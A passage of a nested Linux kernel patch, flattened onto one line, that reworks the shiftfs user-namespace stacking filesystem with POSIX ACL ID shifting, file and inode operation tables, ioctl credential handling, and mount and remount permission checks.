(!gid_valid(e->e_gid)) -+ return -EOVERFLOW; -+ break; -+ } -+ } -+ return 0; -+} - -- inode->i_ino = get_next_ino(); -- inode->i_mode = mode; -- inode->i_flags |= S_NOATIME | S_NOCMTIME; -+static void -+shift_acl_xattr_ids(struct user_namespace *from, struct user_namespace *to, -+ void *value, size_t size) -+{ -+ struct posix_acl_xattr_header *header = value; -+ struct posix_acl_xattr_entry *entry = (void *)(header + 1), *end; -+ int count; -+ kuid_t kuid; -+ kgid_t kgid; - -- inode->i_op = &shiftfs_inode_ops; -+ if (!value) -+ return; -+ if (size < sizeof(struct posix_acl_xattr_header)) -+ return; -+ if (header->a_version != cpu_to_le32(POSIX_ACL_XATTR_VERSION)) -+ return; - -- shiftfs_fill_inode(inode, dentry); -+ count = posix_acl_xattr_count(size); -+ if (count < 0) -+ return; -+ if (count == 0) -+ return; - -- return inode; -+ for (end = entry + count; entry != end; entry++) { -+ switch(le16_to_cpu(entry->e_tag)) { -+ case ACL_USER: -+ kuid = 
make_kuid(&init_user_ns, le32_to_cpu(entry->e_id)); -+ kuid = shift_kuid(from, to, kuid); -+ entry->e_id = cpu_to_le32(from_kuid(&init_user_ns, kuid)); -+ break; -+ case ACL_GROUP: -+ kgid = make_kgid(&init_user_ns, le32_to_cpu(entry->e_id)); -+ kgid = shift_kgid(from, to, kgid); -+ entry->e_id = cpu_to_le32(from_kgid(&init_user_ns, kgid)); -+ break; -+ default: -+ break; -+ } -+ } - } - --static int shiftfs_show_options(struct seq_file *m, struct dentry *dentry) -+static struct posix_acl *shiftfs_get_acl(struct inode *inode, int type) - { -- struct super_block *sb = dentry->d_sb; -- struct shiftfs_super_info *ssi = sb->s_fs_info; -+ struct inode *loweri = inode->i_private; -+ const struct cred *oldcred; -+ struct posix_acl *lower_acl, *acl = NULL; -+ struct user_namespace *from_ns = loweri->i_sb->s_user_ns; -+ struct user_namespace *to_ns = inode->i_sb->s_user_ns; -+ int size; -+ int err; - -- if (ssi->mark) -- seq_show_option(m, "mark", NULL); -+ if (!IS_POSIXACL(loweri)) -+ return NULL; - -- return 0; --} -+ oldcred = shiftfs_override_creds(inode->i_sb); -+ lower_acl = get_acl(loweri, type); -+ revert_creds(oldcred); - --static int shiftfs_statfs(struct dentry *dentry, struct kstatfs *buf) --{ -- struct super_block *sb = dentry->d_sb; -- struct shiftfs_super_info *ssi = sb->s_fs_info; -- struct dentry *root = sb->s_root; -- struct dentry *realroot = root->d_fsdata; -- struct path realpath = { .mnt = ssi->mnt, .dentry = realroot }; -- int err; -+ if (lower_acl && !IS_ERR(lower_acl)) { -+ /* XXX: export posix_acl_clone? 
*/ -+ size = sizeof(struct posix_acl) + -+ lower_acl->a_count * sizeof(struct posix_acl_entry); -+ acl = kmemdup(lower_acl, size, GFP_KERNEL); -+ posix_acl_release(lower_acl); - -- err = vfs_statfs(&realpath, buf); -- if (err) -- return err; -+ if (!acl) -+ return ERR_PTR(-ENOMEM); - -- buf->f_type = sb->s_magic; -+ refcount_set(&acl->a_refcount, 1); - -- return 0; -+ err = shift_acl_ids(from_ns, to_ns, acl); -+ if (err) { -+ kfree(acl); -+ return ERR_PTR(err); -+ } -+ } -+ -+ return acl; - } - --static void shiftfs_put_super(struct super_block *sb) -+static int -+shiftfs_posix_acl_xattr_get(const struct xattr_handler *handler, -+ struct dentry *dentry, struct inode *inode, -+ const char *name, void *buffer, size_t size) - { -- struct shiftfs_super_info *ssi = sb->s_fs_info; -+ struct inode *loweri = inode->i_private; -+ int ret; -+ -+ ret = shiftfs_xattr_get(NULL, dentry, inode, handler->name, -+ buffer, size); -+ if (ret < 0) -+ return ret; - -- mntput(ssi->mnt); -- put_user_ns(ssi->userns); -- kfree(ssi); -+ inode_lock(loweri); -+ shift_acl_xattr_ids(loweri->i_sb->s_user_ns, inode->i_sb->s_user_ns, -+ buffer, size); -+ inode_unlock(loweri); -+ return ret; - } - --static const struct xattr_handler shiftfs_xattr_handler = { -- .prefix = "", -- .get = shiftfs_xattr_get, -- .set = shiftfs_xattr_set, --}; -+static int -+shiftfs_posix_acl_xattr_set(const struct xattr_handler *handler, -+ struct dentry *dentry, struct inode *inode, -+ const char *name, const void *value, -+ size_t size, int flags) -+{ -+ struct inode *loweri = inode->i_private; -+ int err; - --const struct xattr_handler *shiftfs_xattr_handlers[] = { -- &shiftfs_xattr_handler, -- NULL --}; -+ if (!IS_POSIXACL(loweri) || !loweri->i_op->set_acl) -+ return -EOPNOTSUPP; -+ if (handler->flags == ACL_TYPE_DEFAULT && !S_ISDIR(inode->i_mode)) -+ return value ? 
-EACCES : 0; -+ if (!inode_owner_or_capable(inode)) -+ return -EPERM; -+ -+ if (value) { -+ shift_acl_xattr_ids(inode->i_sb->s_user_ns, -+ loweri->i_sb->s_user_ns, -+ (void *)value, size); -+ err = shiftfs_setxattr(dentry, inode, handler->name, value, -+ size, flags); -+ } else { -+ err = shiftfs_removexattr(dentry, handler->name); -+ } - --static const struct super_operations shiftfs_super_ops = { -- .put_super = shiftfs_put_super, -- .show_options = shiftfs_show_options, -- .statfs = shiftfs_statfs, -+ if (!err) -+ shiftfs_copyattr(loweri, inode); -+ -+ return err; -+} -+ -+static const struct xattr_handler -+shiftfs_posix_acl_access_xattr_handler = { -+ .name = XATTR_NAME_POSIX_ACL_ACCESS, -+ .flags = ACL_TYPE_ACCESS, -+ .get = shiftfs_posix_acl_xattr_get, -+ .set = shiftfs_posix_acl_xattr_set, - }; - --struct shiftfs_data { -- void *data; -- const char *path; -+static const struct xattr_handler -+shiftfs_posix_acl_default_xattr_handler = { -+ .name = XATTR_NAME_POSIX_ACL_DEFAULT, -+ .flags = ACL_TYPE_DEFAULT, -+ .get = shiftfs_posix_acl_xattr_get, -+ .set = shiftfs_posix_acl_xattr_set, - }; - --static int shiftfs_fill_super(struct super_block *sb, void *raw_data, -- int silent) --{ -- struct shiftfs_data *data = raw_data; -- char *name = kstrdup(data->path, GFP_KERNEL); -- int err = -ENOMEM; -- struct shiftfs_super_info *ssi = NULL; -- struct path path; -- struct dentry *dentry; -+#else /* !CONFIG_SHIFT_FS_POSIX_ACL */ - -- if (!name) -- goto out; -+#define shiftfs_get_acl NULL - -- ssi = kzalloc(sizeof(*ssi), GFP_KERNEL); -- if (!ssi) -- goto out; -+#endif /* CONFIG_SHIFT_FS_POSIX_ACL */ - -- err = -EPERM; -- err = shiftfs_parse_options(ssi, data->data); -+static const struct inode_operations shiftfs_dir_inode_operations = { -+ .lookup = shiftfs_lookup, -+ .mkdir = shiftfs_mkdir, -+ .symlink = shiftfs_symlink, -+ .unlink = shiftfs_unlink, -+ .rmdir = shiftfs_rmdir, -+ .rename = shiftfs_rename, -+ .link = shiftfs_link, -+ .setattr = shiftfs_setattr, -+ .create 
= shiftfs_create, -+ .mknod = shiftfs_mknod, -+ .permission = shiftfs_permission, -+ .getattr = shiftfs_getattr, -+ .listxattr = shiftfs_listxattr, -+ .get_acl = shiftfs_get_acl, -+}; -+ -+static const struct inode_operations shiftfs_file_inode_operations = { -+ .fiemap = shiftfs_fiemap, -+ .getattr = shiftfs_getattr, -+ .get_acl = shiftfs_get_acl, -+ .listxattr = shiftfs_listxattr, -+ .permission = shiftfs_permission, -+ .setattr = shiftfs_setattr, -+ .tmpfile = shiftfs_tmpfile, -+}; -+ -+static const struct inode_operations shiftfs_special_inode_operations = { -+ .getattr = shiftfs_getattr, -+ .get_acl = shiftfs_get_acl, -+ .listxattr = shiftfs_listxattr, -+ .permission = shiftfs_permission, -+ .setattr = shiftfs_setattr, -+}; -+ -+static const struct inode_operations shiftfs_symlink_inode_operations = { -+ .getattr = shiftfs_getattr, -+ .get_link = shiftfs_get_link, -+ .listxattr = shiftfs_listxattr, -+ .setattr = shiftfs_setattr, -+}; -+ -+static struct file *shiftfs_open_realfile(const struct file *file, -+ struct path *realpath) -+{ -+ struct file *lowerf; -+ const struct cred *oldcred; -+ struct inode *inode = file_inode(file); -+ struct inode *loweri = realpath->dentry->d_inode; -+ struct shiftfs_super_info *info = inode->i_sb->s_fs_info; -+ -+ oldcred = shiftfs_override_creds(inode->i_sb); -+ /* XXX: open_with_fake_path() not gauranteed to stay around, if -+ * removed use dentry_open() */ -+ lowerf = open_with_fake_path(realpath, file->f_flags, loweri, info->creator_cred); -+ revert_creds(oldcred); -+ -+ return lowerf; -+} -+ -+#define SHIFTFS_SETFL_MASK (O_APPEND | O_NONBLOCK | O_NDELAY | O_DIRECT) -+ -+static int shiftfs_change_flags(struct file *file, unsigned int flags) -+{ -+ struct inode *inode = file_inode(file); -+ int err; -+ -+ /* if some flag changed that cannot be changed then something's amiss */ -+ if (WARN_ON((file->f_flags ^ flags) & ~SHIFTFS_SETFL_MASK)) -+ return -EIO; -+ -+ flags &= SHIFTFS_SETFL_MASK; -+ -+ if (((flags ^ file->f_flags) 
& O_APPEND) && IS_APPEND(inode)) -+ return -EPERM; -+ -+ if (flags & O_DIRECT) { -+ if (!file->f_mapping->a_ops || -+ !file->f_mapping->a_ops->direct_IO) -+ return -EINVAL; -+ } -+ -+ if (file->f_op->check_flags) { -+ err = file->f_op->check_flags(flags); -+ if (err) -+ return err; -+ } -+ -+ spin_lock(&file->f_lock); -+ file->f_flags = (file->f_flags & ~SHIFTFS_SETFL_MASK) | flags; -+ spin_unlock(&file->f_lock); -+ -+ return 0; -+} -+ -+static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd) -+{ -+ struct shiftfs_file_info *file_info = file->private_data; -+ struct file *realfile = file_info->realfile; -+ -+ lowerfd->flags = 0; -+ lowerfd->file = realfile; -+ -+ /* Did the flags change since open? */ -+ if (unlikely(file->f_flags & ~lowerfd->file->f_flags)) -+ return shiftfs_change_flags(lowerfd->file, file->f_flags); -+ -+ return 0; -+} -+ -+static int shiftfs_open(struct inode *inode, struct file *file) -+{ -+ struct shiftfs_super_info *ssi = inode->i_sb->s_fs_info; -+ struct shiftfs_file_info *file_info; -+ struct file *realfile; -+ struct path *realpath; -+ -+ file_info = kmem_cache_zalloc(shiftfs_file_info_cache, GFP_KERNEL); -+ if (!file_info) -+ return -ENOMEM; -+ -+ realpath = &file_info->realpath; -+ realpath->mnt = ssi->mnt; -+ realpath->dentry = file->f_path.dentry->d_fsdata; -+ -+ realfile = shiftfs_open_realfile(file, realpath); -+ if (IS_ERR(realfile)) { -+ kmem_cache_free(shiftfs_file_info_cache, file_info); -+ return PTR_ERR(realfile); -+ } -+ -+ file->private_data = file_info; -+ file_info->realfile = realfile; -+ return 0; -+} -+ -+static int shiftfs_release(struct inode *inode, struct file *file) -+{ -+ struct shiftfs_file_info *file_info = file->private_data; -+ -+ if (file_info) { -+ if (file_info->realfile) -+ fput(file_info->realfile); -+ -+ kmem_cache_free(shiftfs_file_info_cache, file_info); -+ } -+ -+ return 0; -+} -+ -+static loff_t shiftfs_llseek(struct file *file, loff_t offset, int whence) -+{ -+ struct inode 
*realinode = file_inode(file)->i_private; -+ -+ return generic_file_llseek_size(file, offset, whence, -+ realinode->i_sb->s_maxbytes, -+ i_size_read(realinode)); -+} -+ -+/* XXX: Need to figure out what to to about atime updates, maybe other -+ * timestamps too ... ref. ovl_file_accessed() */ -+ -+static rwf_t shiftfs_iocb_to_rwf(struct kiocb *iocb) -+{ -+ int ifl = iocb->ki_flags; -+ rwf_t flags = 0; -+ -+ if (ifl & IOCB_NOWAIT) -+ flags |= RWF_NOWAIT; -+ if (ifl & IOCB_HIPRI) -+ flags |= RWF_HIPRI; -+ if (ifl & IOCB_DSYNC) -+ flags |= RWF_DSYNC; -+ if (ifl & IOCB_SYNC) -+ flags |= RWF_SYNC; -+ -+ return flags; -+} -+ -+static ssize_t shiftfs_read_iter(struct kiocb *iocb, struct iov_iter *iter) -+{ -+ struct file *file = iocb->ki_filp; -+ struct fd lowerfd; -+ const struct cred *oldcred; -+ ssize_t ret; -+ -+ if (!iov_iter_count(iter)) -+ return 0; -+ -+ ret = shiftfs_real_fdget(file, &lowerfd); -+ if (ret) -+ return ret; -+ -+ oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb); -+ ret = vfs_iter_read(lowerfd.file, iter, &iocb->ki_pos, -+ shiftfs_iocb_to_rwf(iocb)); -+ revert_creds(oldcred); -+ -+ shiftfs_file_accessed(file); -+ -+ fdput(lowerfd); -+ return ret; -+} -+ -+static ssize_t shiftfs_write_iter(struct kiocb *iocb, struct iov_iter *iter) -+{ -+ struct file *file = iocb->ki_filp; -+ struct inode *inode = file_inode(file); -+ struct fd lowerfd; -+ const struct cred *oldcred; -+ ssize_t ret; -+ -+ if (!iov_iter_count(iter)) -+ return 0; -+ -+ inode_lock(inode); -+ /* Update mode */ -+ shiftfs_copyattr(inode->i_private, inode); -+ ret = file_remove_privs(file); -+ if (ret) -+ goto out_unlock; -+ -+ ret = shiftfs_real_fdget(file, &lowerfd); -+ if (ret) -+ goto out_unlock; -+ -+ oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb); -+ file_start_write(lowerfd.file); -+ ret = vfs_iter_write(lowerfd.file, iter, &iocb->ki_pos, -+ shiftfs_iocb_to_rwf(iocb)); -+ file_end_write(lowerfd.file); -+ revert_creds(oldcred); -+ -+ /* Update size */ -+ 
shiftfs_copyattr(inode->i_private, inode); -+ -+ fdput(lowerfd); -+ -+out_unlock: -+ inode_unlock(inode); -+ return ret; -+} -+ -+static int shiftfs_fsync(struct file *file, loff_t start, loff_t end, -+ int datasync) -+{ -+ struct fd lowerfd; -+ const struct cred *oldcred; -+ int ret; -+ -+ ret = shiftfs_real_fdget(file, &lowerfd); -+ if (ret) -+ return ret; -+ -+ oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb); -+ ret = vfs_fsync_range(lowerfd.file, start, end, datasync); -+ revert_creds(oldcred); -+ -+ fdput(lowerfd); -+ return ret; -+} -+ -+static int shiftfs_mmap(struct file *file, struct vm_area_struct *vma) -+{ -+ struct shiftfs_file_info *file_info = file->private_data; -+ struct file *realfile = file_info->realfile; -+ const struct cred *oldcred; -+ int ret; -+ -+ if (!realfile->f_op->mmap) -+ return -ENODEV; -+ -+ if (WARN_ON(file != vma->vm_file)) -+ return -EIO; -+ -+ oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb); -+ vma->vm_file = get_file(realfile); -+ ret = call_mmap(vma->vm_file, vma); -+ revert_creds(oldcred); -+ -+ shiftfs_file_accessed(file); -+ -+ if (ret) -+ fput(realfile); /* Drop refcount from new vm_file value */ -+ else -+ fput(file); /* Drop refcount from previous vm_file value */ -+ -+ return ret; -+} -+ -+static long shiftfs_fallocate(struct file *file, int mode, loff_t offset, -+ loff_t len) -+{ -+ struct inode *inode = file_inode(file); -+ struct inode *loweri = inode->i_private; -+ struct fd lowerfd; -+ const struct cred *oldcred; -+ int ret; -+ -+ ret = shiftfs_real_fdget(file, &lowerfd); -+ if (ret) -+ return ret; -+ -+ oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb); -+ ret = vfs_fallocate(lowerfd.file, mode, offset, len); -+ revert_creds(oldcred); -+ -+ /* Update size */ -+ shiftfs_copyattr(loweri, inode); -+ -+ fdput(lowerfd); -+ return ret; -+} -+ -+static int shiftfs_fadvise(struct file *file, loff_t offset, loff_t len, -+ int advice) -+{ -+ struct fd lowerfd; -+ const struct cred *oldcred; 
-+ int ret; -+ -+ ret = shiftfs_real_fdget(file, &lowerfd); -+ if (ret) -+ return ret; -+ -+ oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb); -+ ret = vfs_fadvise(lowerfd.file, offset, len, advice); -+ revert_creds(oldcred); -+ -+ fdput(lowerfd); -+ return ret; -+} -+ -+static int shiftfs_override_ioctl_creds(const struct super_block *sb, -+ const struct cred **oldcred, -+ struct cred **newcred) -+{ -+ kuid_t fsuid = current_fsuid(); -+ kgid_t fsgid = current_fsgid(); -+ -+ *oldcred = shiftfs_override_creds(sb); -+ -+ *newcred = prepare_creds(); -+ if (!*newcred) { -+ revert_creds(*oldcred); -+ return -ENOMEM; -+ } -+ -+ (*newcred)->fsuid = KUIDT_INIT(from_kuid(sb->s_user_ns, fsuid)); -+ (*newcred)->fsgid = KGIDT_INIT(from_kgid(sb->s_user_ns, fsgid)); -+ -+ /* clear all caps to prevent bypassing capable() checks */ -+ cap_clear((*newcred)->cap_bset); -+ cap_clear((*newcred)->cap_effective); -+ cap_clear((*newcred)->cap_inheritable); -+ cap_clear((*newcred)->cap_permitted); -+ -+ put_cred(override_creds(*newcred)); -+ return 0; -+} -+ -+static inline void shiftfs_revert_ioctl_creds(const struct cred *oldcred, -+ struct cred *newcred) -+{ -+ return shiftfs_revert_object_creds(oldcred, newcred); -+} -+ -+static long shiftfs_real_ioctl(struct file *file, unsigned int cmd, -+ unsigned long arg) -+{ -+ long ret = 0; -+ struct fd lowerfd; -+ struct cred *newcred; -+ const struct cred *oldcred; -+ struct super_block *sb = file->f_path.dentry->d_sb; -+ -+ ret = shiftfs_real_fdget(file, &lowerfd); -+ if (ret) -+ return ret; -+ -+ ret = shiftfs_override_ioctl_creds(sb, &oldcred, &newcred); -+ if (ret) -+ goto out_fdput; -+ -+ ret = vfs_ioctl(lowerfd.file, cmd, arg); -+ -+ shiftfs_revert_ioctl_creds(oldcred, newcred); -+ -+ shiftfs_copyattr(file_inode(lowerfd.file), file_inode(file)); -+ shiftfs_copyflags(file_inode(lowerfd.file), file_inode(file)); -+ -+out_fdput: -+ fdput(lowerfd); -+ -+ return ret; -+} -+ -+static long shiftfs_ioctl(struct file *file, unsigned 
int cmd, -+ unsigned long arg) -+{ -+ switch (cmd) { -+ case FS_IOC_GETVERSION: -+ /* fall through */ -+ case FS_IOC_GETFLAGS: -+ /* fall through */ -+ case FS_IOC_SETFLAGS: -+ break; -+ default: -+ return -ENOTTY; -+ } -+ -+ return shiftfs_real_ioctl(file, cmd, arg); -+} -+ -+static long shiftfs_compat_ioctl(struct file *file, unsigned int cmd, -+ unsigned long arg) -+{ -+ switch (cmd) { -+ case FS_IOC32_GETVERSION: -+ /* fall through */ -+ case FS_IOC32_GETFLAGS: -+ /* fall through */ -+ case FS_IOC32_SETFLAGS: -+ break; -+ default: -+ return -ENOIOCTLCMD; -+ } -+ -+ return shiftfs_real_ioctl(file, cmd, arg); -+} -+ -+enum shiftfs_copyop { -+ SHIFTFS_COPY, -+ SHIFTFS_CLONE, -+ SHIFTFS_DEDUPE, -+}; -+ -+static ssize_t shiftfs_copyfile(struct file *file_in, loff_t pos_in, -+ struct file *file_out, loff_t pos_out, u64 len, -+ unsigned int flags, enum shiftfs_copyop op) -+{ -+ ssize_t ret; -+ struct fd real_in, real_out; -+ const struct cred *oldcred; -+ struct inode *inode_out = file_inode(file_out); -+ struct inode *loweri = inode_out->i_private; -+ -+ ret = shiftfs_real_fdget(file_out, &real_out); -+ if (ret) -+ return ret; -+ -+ ret = shiftfs_real_fdget(file_in, &real_in); -+ if (ret) { -+ fdput(real_out); -+ return ret; -+ } -+ -+ oldcred = shiftfs_override_creds(inode_out->i_sb); -+ switch (op) { -+ case SHIFTFS_COPY: -+ ret = vfs_copy_file_range(real_in.file, pos_in, real_out.file, -+ pos_out, len, flags); -+ break; -+ -+ case SHIFTFS_CLONE: -+ ret = vfs_clone_file_range(real_in.file, pos_in, real_out.file, -+ pos_out, len, flags); -+ break; -+ -+ case SHIFTFS_DEDUPE: -+ ret = vfs_dedupe_file_range_one(real_in.file, pos_in, -+ real_out.file, pos_out, len, -+ flags); -+ break; -+ } -+ revert_creds(oldcred); -+ -+ /* Update size */ -+ shiftfs_copyattr(loweri, inode_out); -+ -+ fdput(real_in); -+ fdput(real_out); -+ -+ return ret; -+} -+ -+static ssize_t shiftfs_copy_file_range(struct file *file_in, loff_t pos_in, -+ struct file *file_out, loff_t pos_out, -+ 
size_t len, unsigned int flags) -+{ -+ return shiftfs_copyfile(file_in, pos_in, file_out, pos_out, len, flags, -+ SHIFTFS_COPY); -+} -+ -+static loff_t shiftfs_remap_file_range(struct file *file_in, loff_t pos_in, -+ struct file *file_out, loff_t pos_out, -+ loff_t len, unsigned int remap_flags) -+{ -+ enum shiftfs_copyop op; -+ -+ if (remap_flags & ~(REMAP_FILE_DEDUP | REMAP_FILE_ADVISORY)) -+ return -EINVAL; -+ -+ if (remap_flags & REMAP_FILE_DEDUP) -+ op = SHIFTFS_DEDUPE; -+ else -+ op = SHIFTFS_CLONE; -+ -+ return shiftfs_copyfile(file_in, pos_in, file_out, pos_out, len, -+ remap_flags, op); -+} -+ -+static int shiftfs_iterate_shared(struct file *file, struct dir_context *ctx) -+{ -+ const struct cred *oldcred; -+ int err = -ENOTDIR; -+ struct shiftfs_file_info *file_info = file->private_data; -+ struct file *realfile = file_info->realfile; -+ -+ oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb); -+ err = iterate_dir(realfile, ctx); -+ revert_creds(oldcred); -+ -+ return err; -+} -+ -+const struct file_operations shiftfs_file_operations = { -+ .open = shiftfs_open, -+ .release = shiftfs_release, -+ .llseek = shiftfs_llseek, -+ .read_iter = shiftfs_read_iter, -+ .write_iter = shiftfs_write_iter, -+ .fsync = shiftfs_fsync, -+ .mmap = shiftfs_mmap, -+ .fallocate = shiftfs_fallocate, -+ .fadvise = shiftfs_fadvise, -+ .unlocked_ioctl = shiftfs_ioctl, -+ .compat_ioctl = shiftfs_compat_ioctl, -+ .copy_file_range = shiftfs_copy_file_range, -+ .remap_file_range = shiftfs_remap_file_range, -+}; -+ -+const struct file_operations shiftfs_dir_operations = { -+ .compat_ioctl = shiftfs_compat_ioctl, -+ .fsync = shiftfs_fsync, -+ .iterate_shared = shiftfs_iterate_shared, -+ .llseek = shiftfs_llseek, -+ .open = shiftfs_open, -+ .read = generic_read_dir, -+ .release = shiftfs_release, -+ .unlocked_ioctl = shiftfs_ioctl, -+}; -+ -+static const struct address_space_operations shiftfs_aops = { -+ /* For O_DIRECT dentry_open() checks f_mapping->a_ops->direct_IO */ -+ 
.direct_IO = noop_direct_IO, -+}; -+ -+static void shiftfs_fill_inode(struct inode *inode, unsigned long ino, -+ umode_t mode, dev_t dev, struct dentry *dentry) -+{ -+ struct inode *loweri; -+ -+ inode->i_ino = ino; -+ inode->i_flags |= S_NOCMTIME; -+ -+ mode &= S_IFMT; -+ inode->i_mode = mode; -+ switch (mode & S_IFMT) { -+ case S_IFDIR: -+ inode->i_op = &shiftfs_dir_inode_operations; -+ inode->i_fop = &shiftfs_dir_operations; -+ break; -+ case S_IFLNK: -+ inode->i_op = &shiftfs_symlink_inode_operations; -+ break; -+ case S_IFREG: -+ inode->i_op = &shiftfs_file_inode_operations; -+ inode->i_fop = &shiftfs_file_operations; -+ inode->i_mapping->a_ops = &shiftfs_aops; -+ break; -+ default: -+ inode->i_op = &shiftfs_special_inode_operations; -+ init_special_inode(inode, mode, dev); -+ break; -+ } -+ -+ if (!dentry) -+ return; -+ -+ loweri = dentry->d_inode; -+ if (!loweri->i_op->get_link) -+ inode->i_opflags |= IOP_NOFOLLOW; -+ -+ shiftfs_copyattr(loweri, inode); -+ shiftfs_copyflags(loweri, inode); -+ set_nlink(inode, loweri->i_nlink); -+} -+ -+static int shiftfs_show_options(struct seq_file *m, struct dentry *dentry) -+{ -+ struct super_block *sb = dentry->d_sb; -+ struct shiftfs_super_info *sbinfo = sb->s_fs_info; -+ -+ if (sbinfo->mark) -+ seq_show_option(m, "mark", NULL); -+ -+ if (sbinfo->passthrough) -+ seq_printf(m, ",passthrough=%u", sbinfo->passthrough); -+ -+ return 0; -+} -+ -+static int shiftfs_statfs(struct dentry *dentry, struct kstatfs *buf) -+{ -+ struct super_block *sb = dentry->d_sb; -+ struct shiftfs_super_info *sbinfo = sb->s_fs_info; -+ struct dentry *root = sb->s_root; -+ struct dentry *realroot = root->d_fsdata; -+ struct path realpath = { .mnt = sbinfo->mnt, .dentry = realroot }; -+ int err; -+ -+ err = vfs_statfs(&realpath, buf); - if (err) -- goto out; -+ return err; - -- /* to mark a mount point, must be real root */ -- if (ssi->mark && !capable(CAP_SYS_ADMIN)) -- goto out; -+ if (!shiftfs_passthrough_statfs(sbinfo)) -+ buf->f_type = 
sb->s_magic; - -- /* else to mount a mark, must be userns admin */ -- if (!ssi->mark && !ns_capable(current_user_ns(), CAP_SYS_ADMIN)) -- goto out; -+ return 0; -+} - -- err = kern_path(name, LOOKUP_FOLLOW, &path); -+static void shiftfs_evict_inode(struct inode *inode) -+{ -+ struct inode *loweri = inode->i_private; -+ -+ clear_inode(inode); -+ -+ if (loweri) -+ iput(loweri); -+} -+ -+static void shiftfs_put_super(struct super_block *sb) -+{ -+ struct shiftfs_super_info *sbinfo = sb->s_fs_info; -+ -+ if (sbinfo) { -+ mntput(sbinfo->mnt); -+ put_cred(sbinfo->creator_cred); -+ kfree(sbinfo); -+ } -+} -+ -+static const struct xattr_handler shiftfs_xattr_handler = { -+ .prefix = "", -+ .get = shiftfs_xattr_get, -+ .set = shiftfs_xattr_set, -+}; -+ -+const struct xattr_handler *shiftfs_xattr_handlers[] = { -+#ifdef CONFIG_SHIFT_FS_POSIX_ACL -+ &shiftfs_posix_acl_access_xattr_handler, -+ &shiftfs_posix_acl_default_xattr_handler, -+#endif -+ &shiftfs_xattr_handler, -+ NULL -+}; -+ -+static inline bool passthrough_is_subset(int old_flags, int new_flags) -+{ -+ if ((new_flags & old_flags) != new_flags) -+ return false; -+ -+ return true; -+} -+ -+static int shiftfs_remount(struct super_block *sb, int *flags, char *data) -+{ -+ int err; -+ struct shiftfs_super_info new = {}; -+ struct shiftfs_super_info *info = sb->s_fs_info; -+ -+ err = shiftfs_parse_mount_options(&new, data); - if (err) -- goto out; -+ return err; -+ -+ /* Mark mount option cannot be changed. */ -+ if (info->mark || (info->mark != new.mark)) -+ return -EPERM; -+ -+ if (info->passthrough != new.passthrough) { -+ /* Don't allow exceeding passthrough options of mark mount. 
*/ -+ if (!passthrough_is_subset(info->info_mark->passthrough, -+ info->passthrough)) -+ return -EPERM; -+ -+ info->passthrough = new.passthrough; -+ } -+ -+ return 0; -+} - -- err = -EPERM; -+static const struct super_operations shiftfs_super_ops = { -+ .put_super = shiftfs_put_super, -+ .show_options = shiftfs_show_options, -+ .statfs = shiftfs_statfs, -+ .remount_fs = shiftfs_remount, -+ .evict_inode = shiftfs_evict_inode, -+}; -+ -+struct shiftfs_data { -+ void *data; -+ const char *path; -+}; -+ -+static int shiftfs_fill_super(struct super_block *sb, void *raw_data, -+ int silent) -+{ -+ int err; -+ struct path path = {}; -+ struct shiftfs_super_info *sbinfo_mp; -+ char *name = NULL; -+ struct inode *inode = NULL; -+ struct dentry *dentry = NULL; -+ struct shiftfs_data *data = raw_data; -+ struct shiftfs_super_info *sbinfo = NULL; -+ -+ if (!data->path) -+ return -EINVAL; -+ -+ sb->s_fs_info = kzalloc(sizeof(*sbinfo), GFP_KERNEL); -+ if (!sb->s_fs_info) -+ return -ENOMEM; -+ sbinfo = sb->s_fs_info; -+ -+ err = shiftfs_parse_mount_options(sbinfo, data->data); -+ if (err) -+ return err; -+ -+ /* to mount a mark, must be userns admin */ -+ if (!sbinfo->mark && !ns_capable(current_user_ns(), CAP_SYS_ADMIN)) -+ return -EPERM; -+ -+ name = kstrdup(data->path, GFP_KERNEL); -+ if (!name) -+ return -ENOMEM; -+ -+ err = kern_path(name, LOOKUP_FOLLOW, &path); -+ if (err) -+ goto out_free_name; - - if (!S_ISDIR(path.dentry->d_inode->i_mode)) { - err = -ENOTDIR; -- goto out_put; -+ goto out_put_path; - } - -- sb->s_stack_depth = path.dentry->d_sb->s_stack_depth + 1; -- if (sb->s_stack_depth > FILESYSTEM_MAX_STACK_DEPTH) { -- printk(KERN_ERR "shiftfs: maximum stacking depth exceeded\n"); -- err = -EINVAL; -- goto out_put; -- } -+ if (sbinfo->mark) { -+ struct super_block *lower_sb = path.mnt->mnt_sb; -+ -+ /* to mark a mount point, must root wrt lower s_user_ns */ -+ if (!ns_capable(lower_sb->s_user_ns, CAP_SYS_ADMIN)) { -+ err = -EPERM; -+ goto out_put_path; -+ } - -- if 
(ssi->mark) { - /* - * this part is visible unshifted, so make sure no - * executables that could be used to give suid - * privileges - */ - sb->s_iflags = SB_I_NOEXEC; -- ssi->mnt = path.mnt; -- dentry = path.dentry; -- } else { -- struct shiftfs_super_info *mp_ssi; - - /* -- * this leg executes if we're admin capable in -- * the namespace, so be very careful -+ * Handle nesting of shiftfs mounts by referring this mark -+ * mount back to the original mark mount. This is more -+ * efficient and alleviates concerns about stack depth. - */ -+ if (lower_sb->s_magic == SHIFTFS_MAGIC) { -+ sbinfo_mp = lower_sb->s_fs_info; -+ -+ /* Doesn't make sense to mark a mark mount */ -+ if (sbinfo_mp->mark) { -+ err = -EINVAL; -+ goto out_put_path; -+ } -+ -+ if (!passthrough_is_subset(sbinfo_mp->passthrough, -+ sbinfo->passthrough)) { -+ err = -EPERM; -+ goto out_put_path; -+ } -+ -+ sbinfo->mnt = mntget(sbinfo_mp->mnt); -+ dentry = dget(path.dentry->d_fsdata); -+ } else { -+ sbinfo->mnt = mntget(path.mnt); -+ dentry = dget(path.dentry); -+ } -+ -+ sbinfo->creator_cred = prepare_creds(); -+ if (!sbinfo->creator_cred) { -+ err = -ENOMEM; -+ goto out_put_path; -+ } -+ } else { -+ /* -+ * This leg executes if we're admin capable in the namespace, -+ * so be very careful. 
